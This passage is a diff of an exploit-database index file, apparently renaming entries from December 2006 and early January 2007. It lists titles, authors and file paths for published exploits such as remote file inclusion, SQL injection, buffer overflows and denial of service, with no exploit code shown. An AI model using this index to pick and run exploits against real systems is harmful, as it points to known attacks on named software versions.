-2948,platforms/php/webapps/2948.txt,"RateMe <= 1.3.2 - (main.inc.php) Remote File Include",2006-12-18,"Al7ejaz Hacker",php,webapps,0 +2947,platforms/multiple/dos/2947.pl,"wget 1.10.2 - (Unchecked Boundary Condition) Denial of Service Exploit",2006-12-18,"Federico L. Bossi Bonin",multiple,dos,0 +2948,platforms/php/webapps/2948.txt,"RateMe 1.3.2 - (main.inc.php) Remote File Inclusion",2006-12-18,"Al7ejaz Hacker",php,webapps,0 2949,platforms/multiple/dos/2949.c,"Intel 2200BG 802.11 - Beacon frame Kernel Memory Corruption Exploit",2006-12-19,"Breno Silva Pinto",multiple,dos,0 2950,platforms/windows/local/2950.c,"DeepBurner 1.8.0 - (.dbr) File Parsing Buffer Overflow Exploit",2006-12-19,Expanders,windows,local,0 -2951,platforms/multiple/remote/2951.sql,"Oracle <= 9i / 10g (extproc) - Local/Remote Command Execution Exploit",2006-12-19,"Marco Ivaldi",multiple,remote,0 +2951,platforms/multiple/remote/2951.sql,"Oracle 9i / 10g (extproc) - Local/Remote Command Execution Exploit",2006-12-19,"Marco Ivaldi",multiple,remote,0 2952,platforms/windows/dos/2952.py,"WinFtp Server 2.0.2 - (PASV) Remote Denial of Service Exploit",2006-12-19,shinnai,windows,dos,0 -2953,platforms/php/webapps/2953.php,"PHP-Update <= 2.7 extract() Auth Bypass / Shell Inject Exploit",2006-12-19,rgod,php,webapps,0 +2953,platforms/php/webapps/2953.php,"PHP-Update 2.7 extract() Auth Bypass / Shell Inject Exploit",2006-12-19,rgod,php,webapps,0 2954,platforms/linux/dos/2954.html,"KDE 3.5 - (libkhtml) <= 4.2.0 / Unhandled HTML Parse Exception Exploit",2006-12-19,"Federico L. Bossi Bonin",linux,dos,0 -2955,platforms/php/webapps/2955.txt,"Paristemi 0.8.3b (buycd.php) Remote File Include",2006-12-19,nuffsaid,php,webapps,0 -2956,platforms/php/webapps/2956.txt,"phpProfiles <= 3.1.2b - Multiple Remote File Include Vulnerabilities",2006-12-19,nuffsaid,php,webapps,0 -2957,platforms/php/webapps/2957.txt,"PHPFanBase 2.x - (protection.php) Remote File Include",2006-12-19,"Cold Zero",php,webapps,0 -2958,platforms/php/webapps/2958.txt,"cwmVote 1.0 - (archive.php) Remote File Include",2006-12-19,bd0rk,php,webapps,0 -2959,platforms/linux/remote/2959.sql,"Oracle <= 9i / 10g File System Access via utl_file Exploit",2006-12-19,"Marco Ivaldi",linux,remote,0 -2960,platforms/php/webapps/2960.pl,"cwmCounter 5.1.1 - (statistic.php) Remote File Include Exploit",2006-12-19,bd0rk,php,webapps,0 -2961,platforms/hardware/dos/2961.py,"Hewlett-Packard FTP Print Server <= 2.4.5 - Buffer Overflow (PoC)",2006-12-19,"Joxean Koret",hardware,dos,0 +2955,platforms/php/webapps/2955.txt,"Paristemi 0.8.3b (buycd.php) Remote File Inclusion",2006-12-19,nuffsaid,php,webapps,0 +2956,platforms/php/webapps/2956.txt,"phpProfiles 3.1.2b - Multiple Remote File Inclusion Vulnerabilities",2006-12-19,nuffsaid,php,webapps,0 +2957,platforms/php/webapps/2957.txt,"PHPFanBase 2.x - (protection.php) Remote File Inclusion",2006-12-19,"Cold Zero",php,webapps,0 +2958,platforms/php/webapps/2958.txt,"cwmVote 1.0 - (archive.php) Remote File Inclusion",2006-12-19,bd0rk,php,webapps,0 +2959,platforms/linux/remote/2959.sql,"Oracle 9i / 10g File System Access via utl_file Exploit",2006-12-19,"Marco Ivaldi",linux,remote,0 +2960,platforms/php/webapps/2960.pl,"cwmCounter 5.1.1 - (statistic.php) Remote File Inclusion Exploit",2006-12-19,bd0rk,php,webapps,0 +2961,platforms/hardware/dos/2961.py,"Hewlett-Packard FTP Print Server 2.4.5 - Buffer Overflow (PoC)",2006-12-19,"Joxean Koret",hardware,dos,0 2962,platforms/asp/webapps/2962.txt,"Burak Yilmaz Download Portal (down.asp) SQL Injection",2006-12-19,ShaFuck31,asp,webapps,0 2963,platforms/asp/webapps/2963.txt,"cwmExplorer 1.0 - (show_file) Source Code Disclosure",2006-12-19,ajann,asp,webapps,0 -2964,platforms/php/webapps/2964.txt,"Valdersoft Shopping Cart 3.0 - Multiple Remote File Include Vulnerabilities",2006-12-20,mdx,php,webapps,0 -2965,platforms/php/webapps/2965.txt,"TextSend <= 1.5 - (config/sender.php) Remote File Include",2006-12-20,nuffsaid,php,webapps,0 +2964,platforms/php/webapps/2964.txt,"Valdersoft Shopping Cart 3.0 - Multiple Remote File Inclusion Vulnerabilities",2006-12-20,mdx,php,webapps,0 +2965,platforms/php/webapps/2965.txt,"TextSend 1.5 - (config/sender.php) Remote File Inclusion",2006-12-20,nuffsaid,php,webapps,0 2966,platforms/windows/dos/2966.html,"RealPlayer 10.5 - (ActiveX Control) Denial of Service Exploit",2006-12-20,shinnai,windows,dos,0 2967,platforms/windows/dos/2967.cs,"Microsoft Windows - (MessageBox) Memory Corruption Local Denial of Service",2006-12-20,anonymous,windows,dos,0 -2968,platforms/php/webapps/2968.php,"PHP Advanced Transfer Manager <= 1.30 Source Code Disclosure Exploit",2006-12-20,Kacper,php,webapps,0 +2968,platforms/php/webapps/2968.php,"PHP Advanced Transfer Manager 1.30 Source Code Disclosure Exploit",2006-12-20,Kacper,php,webapps,0 2969,platforms/php/webapps/2969.txt,"Php/Mysql Site Builder 0.0.2 - (htm2php.php) File Disclosure",2006-12-21,"the master",php,webapps,0 -2970,platforms/php/webapps/2970.txt,"Newxooper-php 0.9.1 - (mapage.php) Remote File Include",2006-12-21,3l3ctric-Cracker,php,webapps,0 -2971,platforms/php/webapps/2971.txt,"PgmReloaded <= 0.8.5 - Multiple Remote File Include Vulnerabilities",2006-12-21,nuffsaid,php,webapps,0 +2970,platforms/php/webapps/2970.txt,"Newxooper-php 0.9.1 - (mapage.php) Remote File Inclusion",2006-12-21,3l3ctric-Cracker,php,webapps,0 +2971,platforms/php/webapps/2971.txt,"PgmReloaded 0.8.5 - Multiple Remote File Inclusion Vulnerabilities",2006-12-21,nuffsaid,php,webapps,0 2972,platforms/windows/dos/2972.c,"DREAM FTP Server 1.0.2 - (PORT) Remote Denial of Service Exploit",2006-12-21,InTeL,windows,dos,0 -2973,platforms/php/webapps/2973.txt,"PowerClan <= 1.14a (footer.inc.php) Remote File Include",2006-12-21,nuffsaid,php,webapps,0 +2973,platforms/php/webapps/2973.txt,"PowerClan 1.14a (footer.inc.php) Remote File Inclusion",2006-12-21,nuffsaid,php,webapps,0 2974,platforms/windows/remote/2974.pl,"Http explorer Web Server 1.02 - Directory Transversal",2006-12-21,str0ke,windows,remote,0 2975,platforms/php/webapps/2975.pl,"Ixprim CMS 1.2 - Remote Blind SQL Injection Exploit",2006-12-21,DarkFig,php,webapps,0 2976,platforms/php/webapps/2976.txt,"inertianews 0.02b (inertianews_main.php) Remote Include",2006-12-21,bd0rk,php,webapps,0 2977,platforms/php/webapps/2977.txt,"MKPortal M1.1.1 - (Urlobox) Cross-Site Request Forgery",2006-12-21,Demential,php,webapps,0 2978,platforms/windows/dos/2978.py,"XM Easy Personal FTP Server 5.2.1 - (USER) Format String DoS Exploit",2006-12-22,shinnai,windows,dos,0 -2979,platforms/php/webapps/2979.txt,"KISGB <= 5.1.1 - (authenticate.php) Remote File Include",2006-12-22,mdx,php,webapps,0 +2979,platforms/php/webapps/2979.txt,"KISGB 5.1.1 - (authenticate.php) Remote File Inclusion",2006-12-22,mdx,php,webapps,0 2980,platforms/php/webapps/2980.txt,"EternalMart Guestbook 1.10 - (admin/auth.php) Remote Inclusion",2006-12-22,mdx,php,webapps,0 -2981,platforms/php/webapps/2981.php,"open newsletter <= 2.5 - Multiple Vulnerabilities (2)",2006-12-23,BlackHawk,php,webapps,0 -2982,platforms/php/webapps/2982.txt,"3editor CMS <= 0.42 - (index.php) Local File Include",2006-12-22,3l3ctric-Cracker,php,webapps,0 -2983,platforms/php/webapps/2983.txt,"b2 Blog <= 0.5 - (b2verifauth.php) Remote File Include",2006-12-23,mdx,php,webapps,0 -2984,platforms/php/webapps/2984.txt,"SH-News 0.93 - (misc.php) Remote File Include Exploit",2006-12-23,bd0rk,php,webapps,0 +2981,platforms/php/webapps/2981.php,"open newsletter 2.5 - Multiple Vulnerabilities (2)",2006-12-23,BlackHawk,php,webapps,0 +2982,platforms/php/webapps/2982.txt,"3editor CMS 0.42 - (index.php) Local File Inclusion",2006-12-22,3l3ctric-Cracker,php,webapps,0 +2983,platforms/php/webapps/2983.txt,"b2 Blog 0.5 - (b2verifauth.php) Remote File Inclusion",2006-12-23,mdx,php,webapps,0 +2984,platforms/php/webapps/2984.txt,"SH-News 0.93 - (misc.php) Remote File Inclusion Exploit",2006-12-23,bd0rk,php,webapps,0 2985,platforms/windows/dos/2985.pl,"acFTP FTP Server 1.5 - (REST/PBSZ) Remote Denial of Service Exploit",2006-12-23,gbr,windows,dos,0 2986,platforms/asp/webapps/2986.txt,"Enthrallweb ePhotos 1.0 - (subLevel2.asp) SQL Injection",2006-12-23,ajann,asp,webapps,0 2987,platforms/asp/webapps/2987.txt,"Enthrallweb eHomes 1.0 - Multiple (SQL/XSS) Vulnerabilities",2006-12-23,ajann,asp,webapps,0 -2988,platforms/asp/webapps/2988.pl,"Enthrallweb eJobs (newsdetail.asp) Remote SQL Injection Exploit",2006-12-23,ajann,asp,webapps,0 -2989,platforms/asp/webapps/2989.txt,"Enthrallweb eCars 1.0 - (types.asp) Remote SQL Injection",2006-12-23,ajann,asp,webapps,0 -2990,platforms/asp/webapps/2990.pl,"Enthrallweb emates 1.0 - (newsdetail.asp) Remote SQL Injection Exploit",2006-12-23,ajann,asp,webapps,0 -2991,platforms/asp/webapps/2991.pl,"Enthrallweb ePages (actualpic.asp) Remote SQL Injection Exploit",2006-12-23,ajann,asp,webapps,0 -2992,platforms/asp/webapps/2992.txt,"Dragon Business Directory <= 3.01.12 - (ID) SQL Injection",2006-12-23,ajann,asp,webapps,0 -2993,platforms/asp/webapps/2993.txt,"Calendar MX BASIC <= 1.0.2 - (ID) Remote SQL Injection",2006-12-23,ajann,asp,webapps,0 +2988,platforms/asp/webapps/2988.pl,"Enthrallweb eJobs (newsdetail.asp) SQL Injection Exploit",2006-12-23,ajann,asp,webapps,0 +2989,platforms/asp/webapps/2989.txt,"Enthrallweb eCars 1.0 - (types.asp) SQL Injection",2006-12-23,ajann,asp,webapps,0 +2990,platforms/asp/webapps/2990.pl,"Enthrallweb emates 1.0 - (newsdetail.asp) SQL Injection Exploit",2006-12-23,ajann,asp,webapps,0 +2991,platforms/asp/webapps/2991.pl,"Enthrallweb ePages (actualpic.asp) SQL Injection Exploit",2006-12-23,ajann,asp,webapps,0 +2992,platforms/asp/webapps/2992.txt,"Dragon Business Directory 3.01.12 - (ID) SQL Injection",2006-12-23,ajann,asp,webapps,0 +2993,platforms/asp/webapps/2993.txt,"Calendar MX BASIC 1.0.2 - (ID) SQL Injection",2006-12-23,ajann,asp,webapps,0 2994,platforms/asp/webapps/2994.htm,"Enthrallweb eClassifieds 1.0 - Remote User Pass Change Exploit",2006-12-23,ajann,asp,webapps,0 2995,platforms/asp/webapps/2995.htm,"Enthrallweb eCoupons 1.0 - (myprofile.asp) Remote Pass Change Exploit",2006-12-23,ajann,asp,webapps,0 2996,platforms/asp/webapps/2996.htm,"Enthrallweb eNews 1.0 - Remote User Pass Change Exploit",2006-12-23,ajann,asp,webapps,0 -2997,platforms/asp/webapps/2997.pl,"File Upload Manager <= 1.0.6 - (detail.asp) Remote SQL Injection Exploit",2006-12-24,ajann,asp,webapps,0 -2998,platforms/asp/webapps/2998.pl,"Newsletter MX <= 1.0.2 - (ID) Remote SQL Injection Exploit",2006-12-24,ajann,asp,webapps,0 -2999,platforms/php/webapps/2999.pl,"Ultimate PHP Board <= 2.0b1 - (chat/login.php) Code Execution Exploit",2006-12-24,nuffsaid,php,webapps,0 -3000,platforms/php/webapps/3000.pl,"Pagetool CMS <= 1.07 - (pt_upload.php) Remote File Include",2006-12-24,g00ns,php,webapps,0 -3001,platforms/asp/webapps/3001.txt,"Ananda Real Estate <= 3.4 - (agent) Remote SQL Injection",2006-12-24,ajann,asp,webapps,0 -3002,platforms/php/webapps/3002.php,"HLStats <= 1.34 - (hlstats.php) Remote SQL Injection Exploit",2006-12-25,"Michael Brooks",php,webapps,0 -3003,platforms/php/webapps/3003.txt,"Jinzora <= 2.7 - (include_path) Multiple Remote File Include Vulnerabilities",2006-12-25,nuffsaid,php,webapps,0 +2997,platforms/asp/webapps/2997.pl,"File Upload Manager 1.0.6 - (detail.asp) SQL Injection Exploit",2006-12-24,ajann,asp,webapps,0 +2998,platforms/asp/webapps/2998.pl,"Newsletter MX 1.0.2 - (ID) SQL Injection Exploit",2006-12-24,ajann,asp,webapps,0 +2999,platforms/php/webapps/2999.pl,"Ultimate PHP Board 2.0b1 - (chat/login.php) Code Execution Exploit",2006-12-24,nuffsaid,php,webapps,0 +3000,platforms/php/webapps/3000.pl,"Pagetool CMS 1.07 - (pt_upload.php) Remote File Inclusion",2006-12-24,g00ns,php,webapps,0 +3001,platforms/asp/webapps/3001.txt,"Ananda Real Estate 3.4 - (agent) SQL Injection",2006-12-24,ajann,asp,webapps,0 +3002,platforms/php/webapps/3002.php,"HLStats 1.34 - (hlstats.php) SQL Injection Exploit",2006-12-25,"Michael Brooks",php,webapps,0 +3003,platforms/php/webapps/3003.txt,"Jinzora 2.7 - (include_path) Multiple Remote File Inclusion Vulnerabilities",2006-12-25,nuffsaid,php,webapps,0 3004,platforms/php/webapps/3004.txt,"eNdonesia 8.4 - (mod.php/friend.php/admin.php) Multiple Vulnerabilities",2006-12-25,z1ckX(ru),php,webapps,0 -3005,platforms/php/webapps/3005.pl,"MTCMS <= 2.0 - (admin/admin_settings.php) Remote File Include Exploit",2006-12-25,nuffsaid,php,webapps,0 -3006,platforms/php/webapps/3006.txt,"PhpbbXtra 2.0 - (phpbb_root_path) Remote File Include",2006-12-25,"Mehmet Ince",php,webapps,0 -3007,platforms/php/webapps/3007.txt,"Irokez CMS <= 0.7.1 - Multiple Remote File Include Vulnerabilities",2006-12-25,nuffsaid,php,webapps,0 -3008,platforms/php/webapps/3008.pl,"Ciberia Content Federator <= 1.0.1 - (path) Remote File Include Exploit",2006-12-25,DeltahackingTEAM,php,webapps,0 -3009,platforms/php/webapps/3009.txt,"Shadowed Portal Module Character Roster - (mod_root) RFI",2006-12-25,"Mehmet Ince",php,webapps,0 -3010,platforms/php/webapps/3010.txt,"myPHPNuke Module My_eGallery 2.5.6 - (basepath) RFI",2006-12-25,"Mehmet Ince",php,webapps,0 -3011,platforms/php/webapps/3011.pl,"Fishyshoop <= 0.930b Remote Add Administrator Account Exploit",2006-12-25,"James Gray",php,webapps,0 -3012,platforms/php/webapps/3012.txt,"Okul Merkezi Portal 1.0 - (ataturk.php) Remote File Include",2006-12-25,ShaFuck31,php,webapps,0 +3005,platforms/php/webapps/3005.pl,"MTCMS 2.0 - (admin/admin_settings.php) Remote File Inclusion Exploit",2006-12-25,nuffsaid,php,webapps,0 +3006,platforms/php/webapps/3006.txt,"PhpbbXtra 2.0 - (phpbb_root_path) Remote File Inclusion",2006-12-25,"Mehmet Ince",php,webapps,0 +3007,platforms/php/webapps/3007.txt,"Irokez CMS 0.7.1 - Multiple Remote File Inclusion Vulnerabilities",2006-12-25,nuffsaid,php,webapps,0 +3008,platforms/php/webapps/3008.pl,"Ciberia Content Federator 1.0.1 - (path) Remote File Inclusion Exploit",2006-12-25,DeltahackingTEAM,php,webapps,0 +3009,platforms/php/webapps/3009.txt,"Shadowed Portal Module Character Roster - (mod_root) Remote File Inclusion",2006-12-25,"Mehmet Ince",php,webapps,0 +3010,platforms/php/webapps/3010.txt,"myPHPNuke Module My_eGallery 2.5.6 - (basepath) Remote File Inclusion",2006-12-25,"Mehmet Ince",php,webapps,0 +3011,platforms/php/webapps/3011.pl,"Fishyshoop 0.930b Remote Add Administrator Account Exploit",2006-12-25,"James Gray",php,webapps,0 +3012,platforms/php/webapps/3012.txt,"Okul Merkezi Portal 1.0 - (ataturk.php) Remote File Inclusion",2006-12-25,ShaFuck31,php,webapps,0 3013,platforms/windows/dos/3013.py,"Microsoft Windows NetrWkstaUserEnum() Remote DoS Exploit (0Day)",2006-12-25,h07,windows,dos,0 3014,platforms/php/webapps/3014.txt,"logahead UNU edition 1.0 - Remote Upload File / Code Execution",2006-12-25,CorryL,php,webapps,0 -3015,platforms/asp/webapps/3015.pl,"The Classified Ad System 1.0 - (main) Remote SQL Injection Exploit",2006-12-26,ajann,asp,webapps,0 +3015,platforms/asp/webapps/3015.pl,"The Classified Ad System 1.0 - (main) SQL Injection Exploit",2006-12-26,ajann,asp,webapps,0 3016,platforms/php/webapps/3016.php,"Cahier de texte 2.2 Bypass General Access Protection Exploit",2006-12-26,DarkFig,php,webapps,0 -3017,platforms/php/webapps/3017.php,"php-update <= 2.7 - Multiple Vulnerabilities",2006-12-26,rgod,php,webapps,0 -3018,platforms/php/webapps/3018.txt,"mxBB Module pafiledb <= 2.0.1b Remote File Include",2006-12-26,bd0rk,php,webapps,0 -3019,platforms/php/webapps/3019.txt,"myPHPCalendar 10192000b (cal_dir) Remote File Include Vulnerabilities",2006-12-26,Cr@zy_King,php,webapps,0 -3020,platforms/php/webapps/3020.pl,"PHP-Update <= 2.7 - (admin/uploads.php) Remote Code Execution Exploit",2006-12-26,undefined1_,php,webapps,0 -3021,platforms/linux/remote/3021.txt,"ProFTPD <= 1.2.9 rc2 - (ASCII File) Remote Root Exploit",2003-10-15,"Solar Eclipse",linux,remote,21 +3017,platforms/php/webapps/3017.php,"php-update 2.7 - Multiple Vulnerabilities",2006-12-26,rgod,php,webapps,0 +3018,platforms/php/webapps/3018.txt,"mxBB Module pafiledb 2.0.1b Remote File Inclusion",2006-12-26,bd0rk,php,webapps,0 +3019,platforms/php/webapps/3019.txt,"myPHPCalendar 10192000b (cal_dir) Remote File Inclusion Vulnerabilities",2006-12-26,Cr@zy_King,php,webapps,0 +3020,platforms/php/webapps/3020.pl,"PHP-Update 2.7 - (admin/uploads.php) Remote Code Execution Exploit",2006-12-26,undefined1_,php,webapps,0 +3021,platforms/linux/remote/3021.txt,"ProFTPD 1.2.9 rc2 - (ASCII File) Remote Root Exploit",2003-10-15,"Solar Eclipse",linux,remote,21 3022,platforms/windows/remote/3022.txt,"Microsoft Windows - ASN.1 Remote Exploit (MS04-007)",2004-03-26,"Solar Eclipse",windows,remote,445 3023,platforms/linux/dos/3023.c,"KsIRC 1.3.12 - (PRIVMSG) Remote Buffer Overflow PoC",2006-12-26,"Federico L. Bossi Bonin",linux,dos,0 3024,platforms/windows/local/3024.c,"Microsoft Windows NtRaiseHardError Csrss.exe Memory Disclosure Exploit",2006-12-27,"Ruben Santamarta ",windows,local,0 -3025,platforms/php/webapps/3025.pl,"Yrch 1.0 - (plug.inc.php path variable) Remote File Include Exploit",2006-12-27,DeltahackingTEAM,php,webapps,0 -3026,platforms/php/webapps/3026.txt,"Bubla <= 1.0.0rc2 - (bu/process.php) Remote File Include",2006-12-27,DeltahackingTEAM,php,webapps,0 -3027,platforms/php/webapps/3027.txt,"Fantastic News <= 2.1.4 - Multiple Remote File Include Vulnerabilities",2006-12-27,Mr-m07,php,webapps,0 -3028,platforms/php/webapps/3028.txt,"Limbo CMS Module event 1.0 - Remote File Include",2006-12-27,"Mehmet Ince",php,webapps,0 -3029,platforms/php/webapps/3029.php,"Cacti <= 0.8.6i - cmd.php popen() Remote Injection Exploit",2006-12-27,rgod,php,webapps,0 +3025,platforms/php/webapps/3025.pl,"Yrch 1.0 - (plug.inc.php path variable) Remote File Inclusion Exploit",2006-12-27,DeltahackingTEAM,php,webapps,0 +3026,platforms/php/webapps/3026.txt,"Bubla 1.0.0rc2 - (bu/process.php) Remote File Inclusion",2006-12-27,DeltahackingTEAM,php,webapps,0 +3027,platforms/php/webapps/3027.txt,"Fantastic News 2.1.4 - Multiple Remote File Inclusion Vulnerabilities",2006-12-27,Mr-m07,php,webapps,0 +3028,platforms/php/webapps/3028.txt,"Limbo CMS Module event 1.0 - Remote File Inclusion",2006-12-27,"Mehmet Ince",php,webapps,0 +3029,platforms/php/webapps/3029.php,"Cacti 0.8.6i - cmd.php popen() Remote Injection Exploit",2006-12-27,rgod,php,webapps,0 3030,platforms/windows/dos/3030.html,"RealPlayer 10.5 ierpplug.dll Internet Explorer 7 - Denial of Service Exploit",2006-12-28,shinnai,windows,dos,0 -3031,platforms/asp/webapps/3031.txt,"aFAQ 1.0 - (faqDsp.asp catcode) Remote SQL Injection",2006-12-28,ajann,asp,webapps,0 +3031,platforms/asp/webapps/3031.txt,"aFAQ 1.0 - (faqDsp.asp catcode) SQL Injection",2006-12-28,ajann,asp,webapps,0 3032,platforms/asp/webapps/3032.txt,"wywo inout board 1.0 - Multiple Vulnerabilities",2006-12-28,ajann,asp,webapps,0 -3033,platforms/php/webapps/3033.txt,"phpBB2 Plus 1.53 - (Acronym Mod) Remote SQL Injection",2006-12-28,"the master",php,webapps,0 -3034,platforms/windows/dos/3034.py,"AIDeX Mini-WebServer <= 1.1 - Remote Denial of Service Crash Exploit",2006-12-28,shinnai,windows,dos,0 +3033,platforms/php/webapps/3033.txt,"phpBB2 Plus 1.53 - (Acronym Mod) SQL Injection",2006-12-28,"the master",php,webapps,0 +3034,platforms/windows/dos/3034.py,"AIDeX Mini-WebServer 1.1 - Remote Denial of Service Crash Exploit",2006-12-28,shinnai,windows,dos,0 3035,platforms/asp/webapps/3035.txt,"ASPTicker 1.0 - (admin.asp) Login ByPass SQL Injection",2006-12-28,ajann,asp,webapps,0 -3036,platforms/php/webapps/3036.php,"WebText <= 0.4.5.2 - Remote Code Execution Exploit",2006-12-28,Kacper,php,webapps,0 +3036,platforms/php/webapps/3036.php,"WebText 0.4.5.2 - Remote Code Execution Exploit",2006-12-28,Kacper,php,webapps,0 3037,platforms/windows/remote/3037.php,"Durian Web Application Server 3.02 - Remote Buffer Overflow Exploit",2006-12-29,rgod,windows,remote,4002 3038,platforms/windows/dos/3038.php,"Durian Web Application Server 3.02 - Denial of Service Exploit",2006-12-29,rgod,windows,dos,0 3039,platforms/php/webapps/3039.txt,"EasyNews PRO News Publishing 4.0 Password Disclosure",2006-12-29,bd0rk,php,webapps,0 @@ -2719,133 +2719,133 @@ id,file,description,date,author,platform,type,port 3044,platforms/php/webapps/3044.txt,"Voodoo chat 1.0RC1b (users.dat) Password Disclosure",2006-12-30,bd0rk,php,webapps,0 3045,platforms/php/webapps/3045.php,"Cacti 0.8.6i (copy_cacti_user.php) SQL Injection Create Admin Exploit",2006-12-30,rgod,php,webapps,0 3046,platforms/asp/webapps/3046.txt,"SoftArtisans SAFileUp 5.0.14 - (viewsrc.asp) Script Source Disclosure",2006-12-30,"Inge Henriksen",asp,webapps,0 -3047,platforms/php/webapps/3047.txt,"FreeStyle Wiki <= 3.6.2 - (user.dat) Password Disclosure",2006-12-30,bd0rk,php,webapps,0 -3048,platforms/asp/webapps/3048.pl,"Click N Print Coupons <= 2006.01 - (key) Remote SQL Injection Exploit",2006-12-30,ajann,asp,webapps,0 -3049,platforms/php/webapps/3049.php,"IMGallery <= 2.5 Create Uploader Script Exploit",2006-12-30,Kacper,php,webapps,0 -3050,platforms/php/webapps/3050.txt,"Enigma 2 Coppermine Bridge (boarddir) Remote File Include",2006-12-30,"Mehmet Ince",php,webapps,0 -3051,platforms/php/webapps/3051.txt,"Enigma 2 WordPress Bridge (boarddir) - Remote File Include",2006-12-30,"Mehmet Ince",php,webapps,0 +3047,platforms/php/webapps/3047.txt,"FreeStyle Wiki 3.6.2 - (user.dat) Password Disclosure",2006-12-30,bd0rk,php,webapps,0 +3048,platforms/asp/webapps/3048.pl,"Click N Print Coupons 2006.01 - (key) SQL Injection Exploit",2006-12-30,ajann,asp,webapps,0 +3049,platforms/php/webapps/3049.php,"IMGallery 2.5 Create Uploader Script Exploit",2006-12-30,Kacper,php,webapps,0 +3050,platforms/php/webapps/3050.txt,"Enigma 2 Coppermine Bridge (boarddir) Remote File Inclusion",2006-12-30,"Mehmet Ince",php,webapps,0 +3051,platforms/php/webapps/3051.txt,"Enigma 2 WordPress Bridge (boarddir) - Remote File Inclusion",2006-12-30,"Mehmet Ince",php,webapps,0 3052,platforms/windows/dos/3052.c,"Microsoft Windows NtRaiseHardError Csrss.exe-winsrv.dll Double Free",2006-12-31,"Ruben Santamarta ",windows,dos,0 3053,platforms/php/webapps/3053.txt,"Vz (Adp) Forum 2.0.3 - Remote Password Disclosure Vulnerablity",2006-12-31,3l3ctric-Cracker,php,webapps,0 3054,platforms/php/webapps/3054.txt,"P-News 1.16 / 1.17 - (user.dat) Remote Password Disclosure Vulnerablity",2006-12-31,3l3ctric-Cracker,php,webapps,0 3055,platforms/windows/remote/3055.html,"WinZIP 10.0 FileView ActiveX Controls Remote Overflow Exploit",2006-12-31,XiaoHui,windows,remote,0 3056,platforms/windows/dos/3056.pl,"Formbankserver 1.9 - (Name) Remote Denial of Service Exploit",2006-12-31,Bl0od3r,windows,dos,0 -3057,platforms/php/webapps/3057.php,"MDForum <= 2.0.1 - (PNSVlang) Remote Code Execution Exploit",2006-12-31,Kacper,php,webapps,0 +3057,platforms/php/webapps/3057.php,"MDForum 2.0.1 - (PNSVlang) Remote Code Execution Exploit",2006-12-31,Kacper,php,webapps,0 3058,platforms/windows/remote/3058.html,"Rediff Bol Downloader (ActiveX Control) Execute Local File Exploit",2006-12-31,"Gregory R. Panakkal",windows,remote,0 -3059,platforms/php/webapps/3059.txt,"Bubla <= 0.9.2 - (bu_dir) Multiple Remote File Include Vulnerabilities",2006-12-31,DeltahackingTEAM,php,webapps,0 +3059,platforms/php/webapps/3059.txt,"Bubla 0.9.2 - (bu_dir) Multiple Remote File Inclusion Vulnerabilities",2006-12-31,DeltahackingTEAM,php,webapps,0 3060,platforms/asp/webapps/3060.txt,"RBlog 1.0 - (admin.mdb) Remote Password Disclosure Vulnerablity",2007-01-01,"Aria-Security Team",asp,webapps,0 3061,platforms/asp/webapps/3061.txt,"Vizayn Haber (haberdetay.asp id variable) SQL Injection",2007-01-01,chernobiLe,asp,webapps,0 -3062,platforms/asp/webapps/3062.txt,"autoDealer <= 2.0 - (detail.asp iPro) Remote SQL Injection",2007-01-01,ajann,asp,webapps,0 +3062,platforms/asp/webapps/3062.txt,"autoDealer 2.0 - (detail.asp iPro) SQL Injection",2007-01-01,ajann,asp,webapps,0 3063,platforms/windows/remote/3063.pl,"Formbankserver 1.9 - (Name) Directory Transversal",2007-01-01,Bl0od3r,windows,remote,0 3064,platforms/multiple/remote/3064.rb,"Apple Quicktime (rtsp URL Handler) Stack Buffer Overflow Exploit",2007-01-01,MoAB,multiple,remote,0 3065,platforms/cgi/webapps/3065.txt,"WWWBoard 2.0 - (passwd.txt) Remote Password Disclosure",2007-01-01,bd0rk,cgi,webapps,0 3066,platforms/asp/webapps/3066.txt,"newsCMSlite (newsCMS.mdb) Remote Password Disclosure",2007-01-01,KaBuS,asp,webapps,0 -3067,platforms/windows/remote/3067.txt,"QK SMTP <= 3.01 - (RCPT TO) Remote Buffer Overflow Exploit (Perl)",2007-01-01,"Jacopo Cervini",windows,remote,25 -3068,platforms/asp/webapps/3068.htm,"TaskTracker <= 1.5 - (Customize.asp) Remote Add Administrator Exploit",2007-01-01,ajann,asp,webapps,0 +3067,platforms/windows/remote/3067.txt,"QK SMTP 3.01 - (RCPT TO) Remote Buffer Overflow Exploit (Perl)",2007-01-01,"Jacopo Cervini",windows,remote,25 +3068,platforms/asp/webapps/3068.htm,"TaskTracker 1.5 - (Customize.asp) Remote Add Administrator Exploit",2007-01-01,ajann,asp,webapps,0 3069,platforms/osx/dos/3069.pl,"VLC Media Player 0.8.6 - (udp://) Format String Exploit PoC (ppc)",2007-01-02,MoAB,osx,dos,0 3070,platforms/osx/local/3070.pl,"VLC Media Player 0.8.6 - (udp://) Format String Exploit (x86)",2007-01-02,MoAB,osx,local,0 3071,platforms/windows/local/3071.c,"Microsoft Vista - (NtRaiseHardError) Privilege Escalation Exploit",2007-01-03,erasmus,windows,local,0 3072,platforms/windows/remote/3072.py,"Apple Quicktime - (rtsp URL Handler) Buffer Overflow Exploit (Windows 2000)",2007-01-03,"Winny Thomas",windows,remote,0 -3073,platforms/asp/webapps/3073.txt,"LocazoList <= 2.01a beta5 - (subcatID) Remote SQL Injection",2007-01-03,ajann,asp,webapps,0 -3074,platforms/asp/webapps/3074.txt,"E-SMARTCART 1.0 - (product_id) Remote SQL Injection",2007-01-03,ajann,asp,webapps,0 -3075,platforms/php/webapps/3075.pl,"VerliAdmin <= 0.3 - (language.php) Local File Inclusion Exploit",2007-01-03,Kw3[R]Ln,php,webapps,0 -3076,platforms/php/webapps/3076.php,"Simple Web Content Management System Remote SQL Injection Exploit",2007-01-03,DarkFig,php,webapps,0 -3077,platforms/osx/remote/3077.rb,"Apple Quicktime <= 7.1.3 - (HREFTrack) Cross-Zone Scripting Exploit",2007-01-03,MoAB,osx,remote,0 -3078,platforms/windows/dos/3078.pl,"Acunetix WVS <= 4.0 20060717 HTTP Sniffer Component Remote DoS",2007-01-04,nitr0us,windows,dos,0 -3079,platforms/php/webapps/3079.txt,"Aratix <= 0.2.2b11 - (inc/init.inc.php) Remote File Include",2007-01-04,nuffsaid,php,webapps,0 +3073,platforms/asp/webapps/3073.txt,"LocazoList 2.01a beta5 - (subcatID) SQL Injection",2007-01-03,ajann,asp,webapps,0 +3074,platforms/asp/webapps/3074.txt,"E-SMARTCART 1.0 - (product_id) SQL Injection",2007-01-03,ajann,asp,webapps,0 +3075,platforms/php/webapps/3075.pl,"VerliAdmin 0.3 - (language.php) Local File Inclusion 